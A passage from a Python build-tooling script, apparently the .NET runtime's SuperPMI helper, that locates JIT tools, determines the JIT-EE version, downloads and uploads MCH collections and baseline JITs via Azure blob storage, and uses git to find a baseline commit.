coredistools_uri = az_blob_storage_superpmi_container_uri + "/libcoredistools/{}-{}/{}".format(coreclr_args.host_os.lower(), coreclr_args.arch.lower(), coredistools_dll_name)
logging.info("Download: %s -> %s", coredistools_uri, coredistools_location)
urllib.request.urlretrieve(coredistools_uri, coredistools_location)
assert os.path.isfile(coredistools_location)
return coredistools_location
def determine_pmi_location(coreclr_args):
""" Determine pmi.dll location, using the following steps:
First, use the `-pmi_location` argument, if set.
Else, look for pmi.dll on the PATH. This will be true if you build jitutils yourself
and put the built `bin` directory on your PATH.
Else, look for pmi.dll in Core_Root. This is where we cache it if downloaded from Azure Storage
Otherwise, download a cached copy from CLRJIT Azure Storage and cache it in Core_Root.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
pmi_location (str) : path of pmi.dll
"""
if coreclr_args.pmi_location is not None:
pmi_location = os.path.abspath(coreclr_args.pmi_location)
if not os.path.isfile(pmi_location):
raise RuntimeError("PMI not found at {}".format(pmi_location))
logging.info("Using PMI at %s", pmi_location)
else:
path_var = os.environ.get("PATH")
pmi_location = find_file("pmi.dll", path_var.split(os.pathsep)) if path_var is not None else None
if pmi_location is not None:
logging.info("Using PMI found on PATH at %s", pmi_location)
else:
pmi_location = os.path.join(coreclr_args.core_root, "pmi.dll")
if os.path.isfile(pmi_location):
logging.info("Using PMI found at %s", pmi_location)
else:
pmi_uri = az_blob_storage_superpmi_container_uri + "/pmi/pmi.dll"
logging.info("Download: %s -> %s", pmi_uri, pmi_location)
urllib.request.urlretrieve(pmi_uri, pmi_location)
assert os.path.isfile(pmi_location)
return pmi_location
def determine_jit_name(coreclr_args):
""" Determine the jit based on the OS. If "-jit_name" is specified, then use the specified jit.
This function is called for cases where the "-jit_name" flag is not used, so be careful not
to depend on the "jit_name" attribute existing.
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) : name of the jit for this OS
"""
# If `-jit_name` is used, it must be given a full filename, not just a "base name", so use it without additional processing.
if hasattr(coreclr_args, "jit_name") and coreclr_args.jit_name is not None:
return coreclr_args.jit_name
jit_base_name = "clrjit"
if coreclr_args.host_os == "OSX":
return "lib" + jit_base_name + ".dylib"
elif coreclr_args.host_os == "Linux":
return "lib" + jit_base_name + ".so"
elif coreclr_args.host_os == "windows":
return jit_base_name + ".dll"
else:
raise RuntimeError("Unknown OS.")
def find_tool(coreclr_args, tool_name, search_core_root=True, search_product_location=True, search_path=True, throw_on_not_found=True):
""" Find a tool or any specified file (e.g., clrjit.dll) and return the full path to that tool if found.
Args:
coreclr_args (CoreclrArguments): parsed args
tool_name (str): tool to find, e.g., "superpmi.exe"
search_core_root (bool): True to search the Core_Root folder
search_product_location: True to search the build product folder
search_path: True to search along the PATH
Return:
(str) Full path of the tool, or None if not found.
"""
# First, look in Core_Root, if there is one.
if search_core_root and hasattr(coreclr_args, "core_root") and coreclr_args.core_root is not None and os.path.isdir(coreclr_args.core_root):
tool_path = os.path.join(coreclr_args.core_root, tool_name)
if os.path.isfile(tool_path):
logging.debug("Using %s from Core_Root: %s", tool_name, tool_path)
return tool_path
# Next, look in the built product directory, if it exists. We can use superpmi/mcs directly from the
# product build directory instead from Core_Root because they don't depend on managed code libraries.
if search_product_location and hasattr(coreclr_args, "product_location") and coreclr_args.product_location is not None and os.path.isdir(coreclr_args.product_location):
tool_path = os.path.join(coreclr_args.product_location, tool_name)
if os.path.isfile(tool_path):
logging.debug("Using %s from product build location: %s", tool_name, tool_path)
return tool_path
# Finally, look on the PATH
if search_path:
path_var = os.environ.get("PATH")
if path_var is not None:
tool_path = find_file(tool_name, path_var.split(os.pathsep))
if tool_path is not None:
logging.debug("Using %s from PATH: %s", tool_name, tool_path)
return tool_path
if throw_on_not_found:
raise RuntimeError("Tool " + tool_name + " not found. Have you built the runtime repo and created a Core_Root, or put it on your PATH?")
return None
def determine_superpmi_tool_name(coreclr_args):
""" Determine the superpmi tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the superpmi tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "superpmi"
elif coreclr_args.host_os == "windows":
return "superpmi.exe"
else:
raise RuntimeError("Unknown OS.")
def determine_superpmi_tool_path(coreclr_args):
""" Determine the superpmi tool full path
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Path of the superpmi tool to use
"""
superpmi_tool_name = determine_superpmi_tool_name(coreclr_args)
return find_tool(coreclr_args, superpmi_tool_name)
def determine_mcs_tool_name(coreclr_args):
""" Determine the mcs tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the mcs tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "mcs"
elif coreclr_args.host_os == "windows":
return "mcs.exe"
else:
raise RuntimeError("Unsupported OS.")
def determine_mcs_tool_path(coreclr_args):
""" Determine the mcs tool full path
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Path of the mcs tool to use
"""
mcs_tool_name = determine_mcs_tool_name(coreclr_args)
return find_tool(coreclr_args, mcs_tool_name)
def determine_dotnet_tool_name(coreclr_args):
""" Determine the dotnet tool name based on the OS
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) Name of the dotnet tool to use
"""
if coreclr_args.host_os == "OSX" or coreclr_args.host_os == "Linux":
return "dotnet"
elif coreclr_args.host_os == "windows":
return "dotnet.exe"
else:
raise RuntimeError("Unsupported OS.")
def determine_jit_ee_version(coreclr_args):
""" Determine the JIT-EE version to use.
The JIT-EE version is used for determining which MCH files to download and use. It is determined as follows:
1. Try to parse it out of the source code. If we can find src\\coreclr\\inc\\jiteeversionguid.h in the source
tree (and we're already assuming we can find the repo root from the relative path of this script),
then the JIT-EE version lives in jiteeversionguid.h as follows:
constexpr GUID JITEEVersionIdentifier = { /* a5eec3a4-4176-43a7-8c2b-a05b551d4f49 */
0xa5eec3a4,
0x4176,
0x43a7,
{0x8c, 0x2b, 0xa0, 0x5b, 0x55, 0x1d, 0x4f, 0x49}
};
We want the string between the /* */ comments.
2. Find the mcs tool and run "mcs -printJITEEVersion".
3. Otherwise, just use "unknown-jit-ee-version", which will probably cause downstream failures.
NOTE: When using mcs, we need to run the tool. So we need a version that will run. If a user specifies
an "-arch" argument that creates a Core_Root path that won't run, like an arm32 Core_Root on an
x64 machine, this won't work. This could happen if doing "upload" or "list-collections" on
collections from a machine that didn't create the native collections. We should create a "native"
Core_Root and use that in case there are "cross-arch" scenarios.
Args:
coreclr_args (CoreclrArguments): parsed args
Return:
(str) The JIT-EE version to use
"""
jiteeversionguid_h_path = os.path.join(coreclr_args.coreclr_dir, "inc", "jiteeversionguid.h")
if os.path.isfile(jiteeversionguid_h_path):
# The string is near the beginning of the somewhat large file, so just read a line at a time when searching.
with open(jiteeversionguid_h_path, 'r') as file_handle:
for line in file_handle:
match_obj = re.search(r'^constexpr GUID JITEEVersionIdentifier *= *{ */\* *([^ ]*) *\*/', line)
if match_obj is not None:
jiteeversionguid_h_jit_ee_version = match_obj.group(1)
jiteeversionguid_h_jit_ee_version = jiteeversionguid_h_jit_ee_version.lower()
logging.info("Using JIT/EE Version from jiteeversionguid.h: %s", jiteeversionguid_h_jit_ee_version)
return jiteeversionguid_h_jit_ee_version
logging.warning("Warning: couldn't find JITEEVersionIdentifier in %s; is the file corrupt?", jiteeversionguid_h_path)
mcs_path = determine_mcs_tool_path(coreclr_args)
command = [mcs_path, "-printJITEEVersion"]
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_jit_ee_version, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
mcs_jit_ee_version = stdout_jit_ee_version.decode('utf-8').strip()
mcs_jit_ee_version = mcs_jit_ee_version.lower()
logging.info("Using JIT/EE Version from mcs: %s", mcs_jit_ee_version)
return mcs_jit_ee_version
# Otherwise, use the default "unknown" version.
default_jit_ee_version = "unknown-jit-ee-version"
logging.info("Using default JIT/EE Version: %s", default_jit_ee_version)
return default_jit_ee_version
def print_platform_specific_environment_vars(loglevel, coreclr_args, var, value):
""" Print environment variables as set {}={} or export {}={}
Args:
coreclr_args (CoreclrArguments): parsed args
var (str): variable to set
value (str): value being set.
"""
if coreclr_args.host_os == "windows":
logging.log(loglevel, "set %s=%s", var, value)
else:
logging.log(loglevel, "export %s=%s", var, value)
def list_superpmi_collections_container_via_rest_api(url_filter=lambda unused: True):
""" List the superpmi collections using the Azure Storage REST api
Args:
url_filter (lambda: string -> bool): filter to apply to the list. The filter takes a URL and returns True if this URL is acceptable.
Returns:
urls (list): set of collection URLs in Azure Storage that match the filter.
Notes:
This method does not require installing the Azure Storage python package.
"""
# This URI will return *all* the blobs, for all jit-ee-version/OS/architecture combinations.
# pass "prefix=foo/bar/..." to only show a subset. Or, we can filter later using string search.
list_superpmi_container_uri = az_blob_storage_superpmi_container_uri + "?restype=container&comp=list&prefix=" + az_collections_root_folder + "/"
try:
contents = urllib.request.urlopen(list_superpmi_container_uri).read().decode('utf-8')
except Exception as exception:
logging.error("Didn't find any collections using %s", list_superpmi_container_uri)
logging.error(" Error: %s", exception)
return None
# Contents is an XML file with contents like:
#
# <EnumerationResults ContainerName="https://clrjit.blob.core.windows.net/superpmi">
# <Blobs>
# <Blob>
# <Name>jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip</Name>
# <Url>https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip</Url>
# <Properties>
# ...
# </Properties>
# </Blob>
# <Blob>
# <Name>jit-ee-guid/Linux/x64/Linux.x64.Checked.mch.zip</Name>
# <Url>https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.mch.zip</Url>
# ... etc. ...
# </Blobs>
# </EnumerationResults>
#
# We just want to extract the <Url> entries. We could probably use an XML parsing package, but we just
# use regular expressions.
urls_split = contents.split("<Url>")[1:]
urls = []
for item in urls_split:
url = item.split("</Url>")[0].strip()
if url_filter(url):
urls.append(url)
return urls
def process_mch_files_arg(coreclr_args):
""" Process the -mch_files argument. If the argument is empty, then download files from Azure Storage.
If the argument is non-empty, check it for UNC paths and download/cache those files, replacing
them with a reference to the newly cached local paths (this is on Windows only).
Args:
coreclr_args (CoreclrArguments): parsed args
Returns:
nothing
coreclr_args.mch_files is updated
"""
if coreclr_args.mch_files is None:
coreclr_args.mch_files = download_mch(coreclr_args, include_baseline_jit=True)
return
# Create the cache location. Note that we'll create it even if we end up not copying anything.
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
if not os.path.isdir(default_mch_dir):
os.makedirs(default_mch_dir)
# Process the mch_files list. Download and cache UNC and HTTP files.
urls = []
local_mch_files = []
for item in coreclr_args.mch_files:
# On Windows only, see if any of the mch_files are UNC paths (i.e., "\\server\share\...").
# If so, download and cache all the files found there to our usual local cache location, to avoid future network access.
if coreclr_args.host_os == "windows" and item.startswith("\\\\"):
# Special case: if the user specifies a .mch file, we'll also look for and cache a .mch.mct file next to it, if one exists.
# This happens naturally if a directory is passed and we search for all .mch and .mct files in that directory.
mch_file = os.path.abspath(item)
if os.path.isfile(mch_file) and mch_file.endswith(".mch"):
files = [ mch_file ]
mct_file = mch_file + ".mct"
if os.path.isfile(mct_file):
files.append(mct_file)
else:
files = get_files_from_path(mch_file, match_func=lambda path: any(path.endswith(extension) for extension in [".mch", ".mct"]))
for file in files:
# Download file to cache, and report that as the file to use.
cache_file = os.path.join(default_mch_dir, os.path.basename(file))
logging.info("Cache %s => %s", file, cache_file)
local_mch_file = shutil.copy2(file, cache_file)
local_mch_files.append(local_mch_file)
elif item.lower().startswith("http:") or item.lower().startswith("https:"): # probably could use urllib.parse to be more precise
urls.append(item)
else:
# Doesn't appear to be a UNC path (on Windows) or a URL, so just use it as-is.
local_mch_files.append(item)
# Download all the urls at once, and add the local cache filenames to our accumulated list of local file names.
if len(urls) != 0:
local_mch_files += download_urls(urls, default_mch_dir)
# Special case: walk the URLs list list and for every ".mch" or ".mch.zip" file, check to see that either the associated ".mct" file is already
# in the list, or add it to a new list to attempt to download (but don't fail the download if it doesn't exist).
mct_urls = []
for url in urls:
if url.endswith(".mch") or url.endswith(".mch.zip"):
mct_url = url.replace(".mch", ".mch.mct")
if mct_url not in urls:
mct_urls.append(mct_url)
if len(mct_urls) != 0:
local_mch_files += download_urls(mct_urls, default_mch_dir, fail_if_not_found=False)
coreclr_args.mch_files = local_mch_files
def download_mch(coreclr_args, include_baseline_jit=False):
""" Download the mch files. This can be called to re-download files and
overwrite them in the target location.
Args:
coreclr_args (CoreclrArguments): parsed args
include_baseline_jit (bool): If True, also download the baseline jit
Returns:
list containing the directory to which the files were downloaded
"""
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
if os.path.isdir(default_mch_dir) and not coreclr_args.force_download:
# The cache directory is already there, and "--force_download" was passed, so just
# assume it's got what we want.
# NOTE: a different solution might be to verify that everything we would download is
# already in the cache, and simply not download if it is. However, that would
# require hitting the network, and currently once you've cached these, you
# don't need to do that.
logging.info("Found download cache directory \"%s\" and --force_download not set; skipping download", default_mch_dir)
return [ default_mch_dir ]
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
blob_prefix_filter = "{}/{}/{}".format(az_blob_storage_superpmi_container_uri, az_collections_root_folder, blob_filter_string).lower()
# Determine if a URL in Azure Storage should be allowed. The URL looks like:
# https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip
# Filter to just the current jit-ee-guid, OS, and architecture.
# Include both MCH and MCT files as well as the CLR JIT dll (processed below).
# If there are filters, only download those matching files.
def filter_superpmi_collections(url):
url = url.lower()
if "clrjit" in url and not include_baseline_jit:
return False
return url.startswith(blob_prefix_filter) and ((coreclr_args.filter is None) or any((filter_item.lower() in url) for filter_item in coreclr_args.filter))
urls = list_superpmi_collections_container_via_rest_api(filter_superpmi_collections)
if urls is None or len(urls) == 0:
print("No MCH files to download from {}".format(blob_prefix_filter))
return []
download_urls(urls, default_mch_dir)
return [ default_mch_dir ]
def download_urls(urls, target_dir, verbose=True, fail_if_not_found=True):
""" Download a set of files, specified as URLs, to a target directory.
If the URLs are to .ZIP files, then uncompress them and copy all contents
to the target directory.
Args:
urls (list): the URLs to download
target_dir (str): target directory where files are copied. Directory must exist
fail_if_not_found (bool): if True, fail if a download fails due to file not found (HTTP error 404).
Otherwise, ignore the failure.
Returns:
list of local filenames of downloaded files
"""
if verbose:
logging.info("Downloading:")
for url in urls:
logging.info(" %s", url)
local_files = []
# In case we'll need a temp directory for ZIP file processing, create it first.
with TempDir() as temp_location:
for url in urls:
item_name = url.split("/")[-1]
if url.lower().endswith(".zip"):
# Delete everything in the temp_location (from previous iterations of this loop, so previous URL downloads).
temp_location_items = [os.path.join(temp_location, item) for item in os.listdir(temp_location)]
for item in temp_location_items:
if os.path.isdir(item):
shutil.rmtree(item)
else:
os.remove(item)
download_path = os.path.join(temp_location, item_name)
try:
if verbose:
logging.info("Download: %s -> %s", url, download_path)
urllib.request.urlretrieve(url, download_path)
except urllib.error.HTTPError as httperror:
if (httperror == 404) and fail_if_not_found:
raise httperror
# Otherwise, swallow the error and continue to next file.
continue
if verbose:
logging.info("Uncompress %s", download_path)
with zipfile.ZipFile(download_path, "r") as file_handle:
file_handle.extractall(temp_location)
# Copy everything that was extracted to the target directory.
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
items = [ os.path.join(temp_location, item) for item in os.listdir(temp_location) if not item.endswith(".zip") ]
for item in items:
target_path = os.path.join(target_dir, os.path.basename(item))
if verbose:
logging.info("Copy %s -> %s", item, target_path)
shutil.copy2(item, target_dir)
local_files.append(target_path)
else:
# Not a zip file; download directory to target directory
if not os.path.isdir(target_dir):
os.makedirs(target_dir)
download_path = os.path.join(target_dir, item_name)
try:
if verbose:
logging.info("Download: %s -> %s", url, download_path)
urllib.request.urlretrieve(url, download_path)
local_files.append(download_path)
except urllib.error.HTTPError as httperror:
if (httperror == 404) and fail_if_not_found:
raise httperror
# Otherwise, swallow the error and continue to next file.
continue
return local_files
def upload_mch(coreclr_args):
""" Upload a set of MCH files. Each MCH file is first ZIP compressed to save data space and upload/download time.
TODO: Upload baseline altjits or cross-compile JITs?
Args:
coreclr_args (CoreclrArguments): parsed args
"""
def upload_blob(file, blob_name):
blob_client = blob_service_client.get_blob_client(container=az_superpmi_container_name, blob=blob_name)
# Check if the blob already exists, and delete it if it does, before uploading / replacing it.
try:
blob_client.get_blob_properties()
# If no exception, then the blob already exists. Delete it!
logging.warning("Warning: replacing existing blob!")
blob_client.delete_blob()
except Exception:
# Blob doesn't exist already; that's good
pass
with open(file, "rb") as data:
blob_client.upload_blob(data)
files = []
for item in coreclr_args.mch_files:
files += get_files_from_path(item, match_func=lambda path: any(path.endswith(extension) for extension in [".mch"]))
files_to_upload = []
# Special case: walk the files list and for every ".mch" file, check to see that either the associated ".mct" file is already
# in the list, or add it if the ".mct" file exists.
for file in files.copy():
if file.endswith(".mch") and os.stat(file).st_size > 0:
files_to_upload.append(file)
mct_file = file + ".mct"
if os.path.isfile(mct_file) and os.stat(mct_file).st_size > 0:
files_to_upload.append(mct_file)
logging.info("Uploading:")
for item in files_to_upload:
logging.info(" %s", item)
try:
from azure.storage.blob import BlobServiceClient
except:
logging.error("Please install:")
logging.error(" pip install azure-storage-blob")
logging.error("See also https://docs.microsoft.com/en-us/azure/storage/blobs/storage-quickstart-blobs-python")
raise RuntimeError("Missing azure storage package.")
blob_service_client = BlobServiceClient(account_url=az_blob_storage_account_uri, credential=coreclr_args.az_storage_key)
blob_folder_name = "{}/{}/{}/{}".format(az_collections_root_folder, coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
total_bytes_uploaded = 0
with TempDir() as temp_location:
for file in files_to_upload:
# Zip compress the file we will upload
zip_name = os.path.basename(file) + ".zip"
zip_path = os.path.join(temp_location, zip_name)
logging.info("Compress %s -> %s", file, zip_path)
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.write(file, os.path.basename(file))
original_stat_result = os.stat(file)
zip_stat_result = os.stat(zip_path)
logging.info("Compressed {:n} to {:n} bytes".format(original_stat_result.st_size, zip_stat_result.st_size))
total_bytes_uploaded += zip_stat_result.st_size
blob_name = "{}/{}".format(blob_folder_name, zip_name)
logging.info("Uploading: %s (%s) -> %s", file, zip_path, az_blob_storage_superpmi_container_uri + "/" + blob_name)
upload_blob(zip_path, blob_name)
# Upload a JIT matching the MCH files just collected.
# Consider: rename uploaded JIT to include build_type
jit_location = coreclr_args.jit_location
if jit_location is None:
jit_name = determine_jit_name(coreclr_args)
jit_location = os.path.join(coreclr_args.core_root, jit_name)
assert os.path.isfile(jit_location)
jit_name = os.path.basename(jit_location)
jit_blob_name = "{}/{}".format(blob_folder_name, jit_name)
logging.info("Uploading: %s -> %s", jit_location, az_blob_storage_superpmi_container_uri + "/" + jit_blob_name)
upload_blob(jit_location, jit_blob_name)
jit_stat_result = os.stat(jit_location)
total_bytes_uploaded += jit_stat_result.st_size
logging.info("Uploaded {:n} bytes".format(total_bytes_uploaded))
def list_collections_command(coreclr_args):
""" List the SuperPMI collections in Azure Storage
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
blob_prefix_filter = "{}/{}/{}".format(az_blob_storage_superpmi_container_uri, az_collections_root_folder, blob_filter_string).lower()
# Determine if a URL in Azure Storage should be allowed. The URL looks like:
# https://clrjit.blob.core.windows.net/superpmi/jit-ee-guid/Linux/x64/Linux.x64.Checked.frameworks.mch.zip
# By default, filter to just the current jit-ee-guid, OS, and architecture.
# Only include MCH files, not clrjit.dll or MCT (TOC) files.
def filter_superpmi_collections(url: str):
url = url.lower()
return (url.endswith(".mch") or url.endswith(".mch.zip")) and (coreclr_args.all or url.startswith(blob_prefix_filter))
urls = list_superpmi_collections_container_via_rest_api(filter_superpmi_collections)
if urls is None:
return
count = len(urls)
logging.info("SuperPMI list-collections")
logging.info("")
if coreclr_args.all:
logging.info("%s collections", count)
else:
logging.info("%s collections for %s", count, blob_filter_string)
logging.info("")
for url in urls:
logging.info("%s", url)
def list_collections_local_command(coreclr_args):
""" List the SuperPMI collections local cache: where the Azure Storage collections are copied
Args:
coreclr_args (CoreclrArguments) : parsed args
"""
# Display the blob filter string the local cache corresponds to
blob_filter_string = "{}/{}/{}/".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch)
default_mch_root_dir = os.path.join(coreclr_args.spmi_location, "mch")
default_mch_dir = os.path.join(default_mch_root_dir, "{}.{}.{}".format(coreclr_args.jit_ee_version, coreclr_args.target_os, coreclr_args.mch_arch))
# Determine if a file should be allowed. The filenames look like:
# c:\gh\runtime\artifacts\spmi\mch\a5eec3a4-4176-43a7-8c2b-a05b551d4f49.windows.x64\corelib.windows.x64.Checked.mch
# c:\gh\runtime\artifacts\spmi\mch\a5eec3a4-4176-43a7-8c2b-a05b551d4f49.windows.x64\corelib.windows.x64.Checked.mch.mct
# Only include MCH files, not clrjit.dll or MCT (TOC) files.
def filter_superpmi_collections(path: str):
return path.lower().endswith(".mch")
if coreclr_args.all:
if not os.path.isdir(default_mch_root_dir):
logging.error("Local dir \"%s\" not found", default_mch_root_dir)
return
local_items = get_files_from_path(default_mch_root_dir)
else:
if not os.path.isdir(default_mch_dir):
logging.error("Local dir \"%s\" not found", default_mch_dir)
return
local_items = get_files_from_path(default_mch_dir)
filtered_local_items = [item for item in local_items if filter_superpmi_collections(item)]
count = len(filtered_local_items)
logging.info("SuperPMI list-collections --local")
logging.info("")
if coreclr_args.all:
logging.info("%s collections", count)
else:
logging.info("%s collections for %s", count, blob_filter_string)
logging.info("")
for item in filtered_local_items:
logging.info("%s", item)
def merge_mch(coreclr_args):
""" Merge all the files specified by a given pattern into a single output MCH file.
This is a utility function mostly for use by the CI scripting. It is a
thin wrapper around:
mcs -merge <output_mch_path> <pattern> -recursive -dedup -thin
mcs -toc <output_mch_path>
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
True on success, else False
"""
logging.info("Merging %s -> %s", coreclr_args.pattern, coreclr_args.output_mch_path)
mcs_path = determine_mcs_tool_path(coreclr_args)
command = [mcs_path, "-merge", coreclr_args.output_mch_path, coreclr_args.pattern, "-recursive", "-dedup", "-thin"]
return_code = run_and_log(command)
if return_code != 0:
logging.error("mcs -merge Failed with code %s", return_code)
return False
logging.info("Creating MCT file for %s", coreclr_args.output_mch_path)
command = [mcs_path, "-toc", coreclr_args.output_mch_path]
return_code = run_and_log(command)
if return_code != 0:
logging.error("mcs -toc Failed with code %s", return_code)
return False
return True
def get_mch_files_for_replay(coreclr_args):
""" Given the argument `mch_files`, and any specified filters, find all the MCH files to
use for replay.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
None if error (with an error message already printed), else a list of MCH files.
"""
if coreclr_args.mch_files is None:
logging.error("No MCH files specified")
return None
mch_files = []
for item in coreclr_args.mch_files:
# If there are specified filters, only run those matching files.
mch_files += get_files_from_path(item,
match_func=lambda path:
any(path.endswith(extension) for extension in [".mch"])
and ((coreclr_args.filter is None) or any(filter_item.lower() in path for filter_item in coreclr_args.filter)))
if len(mch_files) == 0:
logging.error("No MCH files found to replay")
return None
return mch_files
def process_base_jit_path_arg(coreclr_args):
""" Process the -base_jit_path argument.
If the argument is present, check it for being a path to a file.
If not present, try to find and download a baseline JIT based on the current environment:
1. Determine the current git hash using:
git rev-parse HEAD
or use the `-git_hash` argument (call the result `git_hash`).
2. Determine the baseline: where does this hash meet `master` using:
git merge-base `git_hash` master
or use the `-base_git_hash` argument (call the result `base_git_hash`).
3. If the `-base_git_hash` argument is used, use that directly as the exact git
hash of the baseline JIT to use.
4. Otherwise, figure out the latest hash, starting with `base_git_hash`, that contains any changes to
the src\\coreclr\\jit directory. (We do this because the JIT rolling build only includes
builds for changes to this directory. So, this logic needs to stay in sync with the logic
that determines what causes the JIT directory to be rebuilt. E.g., it should also get
rebuilt if the JIT-EE interface GUID changes. Alternatively, we can take the entire list
of changes, and probe the rolling build drop for all of them.)
5. Check if we've already downloaded a JIT that matches `base_git_hash`, and use that if available.
6. Starting with `base_git_hash`, and possibly walking to older changes, look for matching builds
in the JIT rolling build drops.
7. If a baseline clrjit is found, download it to the `spmi/basejit/git-hash.os.architecture.build_type`
cache directory.
8. Set coreclr_args.base_jit_path to the full path to the downloaded baseline JIT.
Args:
coreclr_args (CoreclrArguments) : parsed args
Returns:
Nothing
coreclr_args.base_jit_path is set to the path to the JIT to use for the baseline JIT.
"""
if coreclr_args.base_jit_path is not None:
if not os.path.isfile(coreclr_args.base_jit_path):
raise RuntimeError("Specified -base_jit_path does not point to a file")
return
# We cache baseline jits under the following directory. Note that we can't create the full directory path
# until we know the baseline JIT hash.
default_basejit_root_dir = os.path.join(coreclr_args.spmi_location, "basejit")
# Do all the remaining commands, including a number of 'git' commands including relative paths,
# from the root of the runtime repo.
with ChangeDir(coreclr_args.runtime_repo_location):
if coreclr_args.git_hash is None:
command = [ "git", "rev-parse", "HEAD" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_git_rev_parse, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
current_hash = stdout_git_rev_parse.decode('utf-8').strip()
logging.debug("Current hash: %s", current_hash)
else:
raise RuntimeError("Couldn't determine current git hash")
else:
current_hash = coreclr_args.git_hash
if coreclr_args.base_git_hash is None:
# We've got the current hash; figure out the baseline hash.
command = [ "git", "merge-base", current_hash, "master" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_git_merge_base, _ = proc.communicate()
return_code = proc.returncode
if return_code == 0:
baseline_hash = stdout_git_merge_base.decode('utf-8').strip()
logging.info("Baseline hash: %s", current_hash)
else:
raise RuntimeError("Couldn't determine baseline git hash")
else:
baseline_hash = coreclr_args.base_git_hash
if coreclr_args.base_git_hash is None:
# Enumerate the last 20 changes, starting with the baseline, that included JIT changes.
command = [ "git", "log", "--pretty=format:%H", baseline_hash, "-20", "--", "src/coreclr/jit/*" ]
logging.debug("Invoking: %s", " ".join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_change_list, _ = proc.communicate()
return_code = proc.returncode
change_list_hashes = []
if return_code == 0:
change_list_hashes = stdout_change_list.decode('utf-8').strip().splitlines()
else:
raise RuntimeError("Couldn't determine list of JIT changes starting with baseline hash")
if len(change_list_hashes) == 0:
raise RuntimeError("No JIT changes found starting with baseline hash")
else:
# If `-base_git_hash` is specified, then we use exactly that hash and no other for the baseline.
change_list_hashes = [ coreclr_args.base_git_hash ]
# For each hash, (1) see if we have the JIT already, and if not (2) try to download the corresponding JIT from the rolling build.
hashnum = 1
for git_hash in change_list_hashes:
logging.debug("%s: %s", hashnum, git_hash)
jit_name = determine_jit_name(coreclr_args)
basejit_dir = os.path.join(default_basejit_root_dir, "{}.{}.{}.{}".format(git_hash, coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type))
basejit_path = os.path.join(basejit_dir, jit_name)
if os.path.isfile(basejit_path):
# We found this baseline JIT in our cache; use it!
coreclr_args.base_jit_path = basejit_path
logging.info("Using baseline %s", coreclr_args.base_jit_path)
return
# It's not in our cache; is there one built by the rolling build to download?
blob_folder_name = "{}/{}/{}/{}/{}/{}".format(az_builds_root_folder, git_hash, coreclr_args.host_os, coreclr_args.arch, coreclr_args.build_type, jit_name)
blob_uri = "{}/{}".format(az_blob_storage_jitrollingbuild_container_uri, blob_folder_name)
urls = [ blob_uri ]
local_files = download_urls(urls, basejit_dir, verbose=False, fail_if_not_found=False)
if len(local_files) > 0:
if hashnum > 1:
logging.warning("Warning: the baseline found is not built with the first git hash with JIT code changes; there may be extraneous diffs")
# We expect local_files to be length 1, since we only attempted to download a single file.
if len(local_files) > 1:
logging.error("Error: downloaded more than one file?")
coreclr_args.base_jit_path = local_files[0]
logging.info("Downloaded %s", blob_uri)
logging.info("Using baseline %s", coreclr_args.base_jit_path)
return
# We didn't find a baseline; keep looking
hashnum += 1
# We ran out of hashes of JIT changes, and didn't find a baseline. Give up.
logging.error("Error: no baseline JIT found")
raise RuntimeError("No baseline JIT found")
def setup_args(args):
""" Setup the args for SuperPMI to use.
Args:
args (ArgParse): args parsed by arg parser
Returns:
args (CoreclrArguments)
"""
# Start setting up logging.
# Set up the console logger immediately. Later, after we've parsed some arguments, we'll add the file logger and
# change the console logger level to the one parsed by the arguments. We need to do this initial setup before the first
# logging command is executed.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
# Parse the arguments
coreclr_args = CoreclrArguments(args, require_built_core_root=False, require_built_product_dir=False, require_built_test_dir=False, default_build_type="Checked")
coreclr_args.verify(args,
"mode", # "mode" is from the `parser.add_subparsers(dest='mode')` call
lambda unused: True,
"Unable to set mode")
coreclr_args.verify(args,
"log_level",
lambda arg: any(arg.upper() == level for level in [ "CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG" ]),
"Unable to set log_level {}".format,
